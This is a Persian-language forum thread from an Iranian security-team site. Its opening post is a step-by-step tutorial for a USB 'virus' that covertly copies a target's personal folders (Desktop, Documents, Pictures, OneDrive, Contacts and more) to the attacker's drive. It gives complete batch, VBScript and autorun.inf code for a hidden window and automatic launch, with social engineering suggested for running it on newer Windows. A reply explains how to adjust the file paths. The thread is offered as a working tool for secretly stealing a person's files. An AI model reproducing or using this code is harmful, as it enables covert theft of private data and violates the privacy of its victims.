رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام دوستان.

در این تاپیک می خوام نحوه ساخت ویروسی برای کپی اطلاعات به صورت فیزیکی اون هم بدون اطلاع تارگت را قرار بدم. (شاید تو خیلی فیلم ها دیده باشید)

برای انجام تمیز و کامل شما نیاز به چهار فایل دارید(فقط یکی از فایل ها ضروری است و بقیه فایل ها برای به جا نگذاشتن رد است)

به علت خطرناک نبودن فایل ها برای سیستم، آنتی ویروس ها کاری به فایل های ما ندارن.

ساخت فایل اصلی

برای ساخت ویروس می توانید از یک تکست ادیتور ساده مثل Notepad استفاده کنید، کد زیر را داخل یک فایل bat قرار دهید و نام آن را file.bat بگذارید (حتما فایل را با فرمت .bat ذخیره کنید.)

:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y /g
echo off
%backupcmd% "%USERPROFILE%\Desktop" "%drive%\SRX\Desktop"
%backupcmd% "%USERPROFILE%\pictures" "%drive%\SRX\My pics"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\SRX\Documents"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\SRX\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\SRX\vids"
%backupcmd% "%USERPROFILE%\Download" "%drive%\SRX\Download"
%backupcmd% "%USERPROFILE%\Music" "%drive%\SRX\Music"
%backupcmd% "%USERPROFILE%\OneDrive" "%drive%\SRX\OneDrive"
%backupcmd% "%USERPROFILE%\3D Objects" "%drive%\SRX\3D Objects"
%backupcmd% "%USERPROFILE%\Contacts" "%drive%\SRX\Contacts"
@echo off 

 

مخفی سازی هنگام اجرا

برای مخفی کردن فایل هنگام اجرا نیاز به دو فایل دارید.

 

فایل اول

دوباره Notepad را باز کنید و فایلی با عنوان invisible.vbs بسازید و کد زیرا داخل آن قرار دهید. (حتما فایل را با فرمت .vbs  -مخفف وی‌بی‌اسکریپت- ذخیره کنید)

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

 

فایل دوم

مجددا Notepad را باز کنید و یک فایل .bat دیگر بسازید و کد زیر را درونش قرار دهید. می توانید نام فایل را launcher.bat بگذارید.

wscript.exe "%drive%\invisible.vbs" "%drive%\file.bat"

 

نکته: یک فایل دیگر هم هست که فقط زمانی کاربرد که ویندوز تارگت شما 7 یا کمتر از 7 باشد.البته بهتر است این فایل هم کنار فایل هایتان داشته باشید چون اگر اجرا شود خیلی می تواند در روند کار به شما کمک کند. در غیر این صورت شما نیازمند این فایل نیستید و می توانید از آن صرف نظر کنید.

 

استفاده از Autorun

Notepad را باز کنید و فایلی با عنوان autorun.inf درست کنید و کد زیر را درونش قرار دهید.

[autorun]
open=launcher.bat

 

تمام فایل ها را درون هارد یا فلشتون منتقل کنید (ترجیحا از چیزی با حافظه ذخیره سازی بالا مثل هارد استفاده کنید تا مشکل کمبود فضا نداشته باشید)

 

اگر تارگت شما از ویندوز 7 به پایین استفاده می کرد شما فقط باید هارد یا فلشتون رو به سیستم متصل کنید.

اما اگر تارگت از ویندوز 8 ، 8.1 یا 10 استفاده می کرد باید خیلی سریع و به صورت مخفیانه فایل launcher.bat رو اجرا کنید. (می توانید از مهندسی اجتماعی برای انجام کار استفاده کنید)

 

اطلاعاتی که کپی می شود را می توانید به محض اجرای فایل در پوشه ای با نام SRX مشاهده کنید.

 

امیدوارم که استفاده کافی رو برده باشد🌹

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

عملکرد فایل ها  (به صورت ویدیویی)

با کیفیت 720p ببینید تا متن ها قابل مشاهده باشد.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در صورت اجرا نشدن ویدیو از اینجا اقدام کنید

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

شما فایل را در Downloads/guard---------------/Guardiran اجرا می کنید.

اگه به فایل launcher.bat را با notepad باز کنید می بینید که من قبل از  invisible.vbs\ و file.bat\ از %drive% استفاده کردم. یعنی فایل ها طوری طراحی شده که فقط روی یک حافظه ذخیره سازی خارجی (و در دایرکتوری اصلی) اجرا شود.

اگر می خواهید فایل ها را داخل پوشه ای، درون هارد یا فلشتون منتقل کنید باید فایل invisible.vbs را اینطور ویرایش کنید:

wscript.exe "%drive%\YourFolderName\invisible.vbs" "%drive%\YourFolderName\file.bat"

 

وگرنه فقط کافیه فقط همه فایل ها را درون هارد یا فلشتون(در دایرکتوری اصلی) منتقل کنید و بعد فایل launcher.bat را آنجا اجرا کنید.

اگر ویدیو را دیده باشید من فایل launcher.bat را روی هارد اکسترنال اجرا کردم، نه روی هارد سیستم.

 

موفق باشید.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...